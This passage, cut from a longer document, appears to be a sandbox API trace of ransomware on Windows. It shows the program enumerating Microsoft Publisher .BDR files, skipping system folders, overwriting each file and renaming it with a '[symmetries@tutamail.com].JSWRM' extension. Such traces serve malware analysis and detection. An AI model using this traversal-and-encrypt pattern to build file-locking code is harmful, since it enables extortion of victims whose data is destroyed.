Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB1A.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub1a.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.878] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=62036) returned 1 [0139.878] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.879] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xf250, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xf250, lpOverlapped=0x0) returned 1 [0139.884] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.884] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xf250, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xf250, lpOverlapped=0x0) returned 1 [0139.884] CloseHandle (hObject=0x238) returned 1 [0139.884] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB1A.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub1a.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB1A.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub1a.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.885] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x246bb96e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x246bb96e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x246bb96e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3574, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSPUB1B.BDR", cAlternateFileName="")) returned 1 [0139.885] lstrcmpiW (lpString1="MSPUB1B.BDR", lpString2=".") returned 1 [0139.885] lstrcmpiW (lpString1="MSPUB1B.BDR", lpString2="..") returned 1 [0139.885] lstrcmpiW (lpString1="MSPUB1B.BDR", lpString2="...") returned 1 [0139.885] lstrcmpiW (lpString1="MSPUB1B.BDR", lpString2="windows") returned -1 [0139.886] lstrcmpiW (lpString1="MSPUB1B.BDR", lpString2="recovery") returned -1 [0139.886] lstrcmpiW (lpString1="MSPUB1B.BDR", lpString2="perflogs") returned -1 [0139.886] lstrcmpiW (lpString1="MSPUB1B.BDR", lpString2="documents and settings") returned 1 [0139.886] lstrcmpiW (lpString1="MSPUB1B.BDR", lpString2="$RECYCLE.BIN") returned 1 [0139.886] lstrcmpiW (lpString1="MSPUB1B.BDR", lpString2="system volume information") returned -1 [0139.886] lstrcmpiW (lpString1="MSPUB1B.BDR", lpString2="msocache") returned 1 [0139.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB1B.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB1B.BDR", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB1B.BDR", lpUsedDefaultChar=0x0) returned 11 [0139.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB1B.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB1B.BDR", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB1B.BDR", lpUsedDefaultChar=0x0) returned 11 [0139.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.886] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB1B.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub1b.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.887] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13684) returned 1 [0139.887] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.887] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3570, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x3570, lpOverlapped=0x0) returned 1 [0139.890] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.890] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3570, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x3570, lpOverlapped=0x0) returned 1 [0139.890] CloseHandle (hObject=0x238) returned 1 [0139.890] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB1B.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub1b.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB1B.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub1b.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.931] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x216c02db, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x216c02db, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x216c02db, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc8f8, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSPUB2A.BDR", cAlternateFileName="")) returned 1 [0139.931] lstrcmpiW (lpString1="MSPUB2A.BDR", lpString2=".") returned 1 [0139.931] lstrcmpiW (lpString1="MSPUB2A.BDR", lpString2="..") returned 1 [0139.931] lstrcmpiW (lpString1="MSPUB2A.BDR", lpString2="...") returned 1 [0139.931] lstrcmpiW (lpString1="MSPUB2A.BDR", lpString2="windows") returned -1 [0139.931] lstrcmpiW (lpString1="MSPUB2A.BDR", lpString2="recovery") returned -1 [0139.932] lstrcmpiW (lpString1="MSPUB2A.BDR", lpString2="perflogs") returned -1 [0139.932] lstrcmpiW (lpString1="MSPUB2A.BDR", lpString2="documents and settings") returned 1 [0139.932] lstrcmpiW (lpString1="MSPUB2A.BDR", lpString2="$RECYCLE.BIN") returned 1 [0139.932] lstrcmpiW (lpString1="MSPUB2A.BDR", lpString2="system volume information") returned -1 [0139.932] lstrcmpiW (lpString1="MSPUB2A.BDR", lpString2="msocache") returned 1 [0139.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB2A.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB2A.BDR", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB2A.BDR", lpUsedDefaultChar=0x0) returned 11 [0139.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB2A.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB2A.BDR", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB2A.BDR", lpUsedDefaultChar=0x0) returned 11 [0139.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.932] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB2A.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub2a.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.934] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=51448) returned 1 [0139.934] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.934] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xc8f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xc8f0, lpOverlapped=0x0) returned 1 [0139.939] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.939] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xc8f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xc8f0, lpOverlapped=0x0) returned 1 [0139.939] CloseHandle (hObject=0x238) returned 1 [0139.939] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB2A.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub2a.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB2A.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub2a.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.941] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2169a085, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2169a085, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x216c02db, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3e00, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSPUB2B.BDR", cAlternateFileName="")) returned 1 [0139.941] lstrcmpiW (lpString1="MSPUB2B.BDR", lpString2=".") returned 1 [0139.941] lstrcmpiW (lpString1="MSPUB2B.BDR", lpString2="..") returned 1 [0139.941] lstrcmpiW (lpString1="MSPUB2B.BDR", lpString2="...") returned 1 [0139.941] lstrcmpiW (lpString1="MSPUB2B.BDR", lpString2="windows") returned -1 [0139.941] lstrcmpiW (lpString1="MSPUB2B.BDR", lpString2="recovery") returned -1 [0139.941] lstrcmpiW (lpString1="MSPUB2B.BDR", lpString2="perflogs") returned -1 [0139.941] lstrcmpiW (lpString1="MSPUB2B.BDR", lpString2="documents and settings") returned 1 [0139.941] lstrcmpiW (lpString1="MSPUB2B.BDR", lpString2="$RECYCLE.BIN") returned 1 [0139.941] lstrcmpiW (lpString1="MSPUB2B.BDR", lpString2="system volume information") returned -1 [0139.941] lstrcmpiW (lpString1="MSPUB2B.BDR", lpString2="msocache") returned 1 [0139.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB2B.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB2B.BDR", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB2B.BDR", lpUsedDefaultChar=0x0) returned 11 [0139.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB2B.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB2B.BDR", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB2B.BDR", lpUsedDefaultChar=0x0) returned 11 [0139.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.942] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB2B.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub2b.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.942] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15872) returned 1 [0139.942] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.942] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3e00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x3e00, lpOverlapped=0x0) returned 1 [0139.945] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.945] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3e00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x3e00, lpOverlapped=0x0) returned 1 [0139.946] CloseHandle (hObject=0x238) returned 1 [0139.946] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB2B.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub2b.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB2B.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub2b.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.947] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2169a085, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2169a085, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x216c02db, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xde58, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSPUB3A.BDR", cAlternateFileName="")) returned 1 [0139.947] lstrcmpiW (lpString1="MSPUB3A.BDR", lpString2=".") returned 1 [0139.947] lstrcmpiW (lpString1="MSPUB3A.BDR", lpString2="..") returned 1 [0139.947] lstrcmpiW (lpString1="MSPUB3A.BDR", lpString2="...") returned 1 [0139.947] lstrcmpiW (lpString1="MSPUB3A.BDR", lpString2="windows") returned -1 [0139.947] lstrcmpiW (lpString1="MSPUB3A.BDR", lpString2="recovery") returned -1 [0139.947] lstrcmpiW (lpString1="MSPUB3A.BDR", lpString2="perflogs") returned -1 [0139.947] lstrcmpiW (lpString1="MSPUB3A.BDR", lpString2="documents and settings") returned 1 [0139.947] lstrcmpiW (lpString1="MSPUB3A.BDR", lpString2="$RECYCLE.BIN") returned 1 [0139.947] lstrcmpiW (lpString1="MSPUB3A.BDR", lpString2="system volume information") returned -1 [0139.948] lstrcmpiW (lpString1="MSPUB3A.BDR", lpString2="msocache") returned 1 [0139.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB3A.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB3A.BDR", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB3A.BDR", lpUsedDefaultChar=0x0) returned 11 [0139.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB3A.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB3A.BDR", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB3A.BDR", lpUsedDefaultChar=0x0) returned 11 [0139.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB3A.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub3a.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.948] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=56920) returned 1 [0139.949] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.949] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xde50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xde50, lpOverlapped=0x0) returned 1 [0139.954] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.954] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xde50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xde50, lpOverlapped=0x0) returned 1 [0139.954] CloseHandle (hObject=0x238) returned 1 [0139.954] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB3A.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub3a.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB3A.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub3a.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.955] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2169a085, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2169a085, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x216c02db, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf4e, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSPUB3B.BDR", cAlternateFileName="")) returned 1 [0139.955] lstrcmpiW (lpString1="MSPUB3B.BDR", lpString2=".") returned 1 [0139.955] lstrcmpiW (lpString1="MSPUB3B.BDR", lpString2="..") returned 1 [0139.955] lstrcmpiW (lpString1="MSPUB3B.BDR", lpString2="...") returned 1 [0139.955] lstrcmpiW (lpString1="MSPUB3B.BDR", lpString2="windows") returned -1 [0139.955] lstrcmpiW (lpString1="MSPUB3B.BDR", lpString2="recovery") returned -1 [0139.955] lstrcmpiW (lpString1="MSPUB3B.BDR", lpString2="perflogs") returned -1 [0139.955] lstrcmpiW (lpString1="MSPUB3B.BDR", lpString2="documents and settings") returned 1 [0139.955] lstrcmpiW (lpString1="MSPUB3B.BDR", lpString2="$RECYCLE.BIN") returned 1 [0139.955] lstrcmpiW (lpString1="MSPUB3B.BDR", lpString2="system volume information") returned -1 [0139.955] lstrcmpiW (lpString1="MSPUB3B.BDR", lpString2="msocache") returned 1 [0139.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB3B.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB3B.BDR", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB3B.BDR", lpUsedDefaultChar=0x0) returned 11 [0139.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB3B.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB3B.BDR", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB3B.BDR", lpUsedDefaultChar=0x0) returned 11 [0139.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.956] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB3B.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub3b.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.956] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3918) returned 1 [0139.956] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.956] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xf40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xf40, lpOverlapped=0x0) returned 1 [0139.958] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.958] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xf40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xf40, lpOverlapped=0x0) returned 1 [0139.958] CloseHandle (hObject=0x238) returned 1 [0139.958] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB3B.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub3b.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB3B.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: 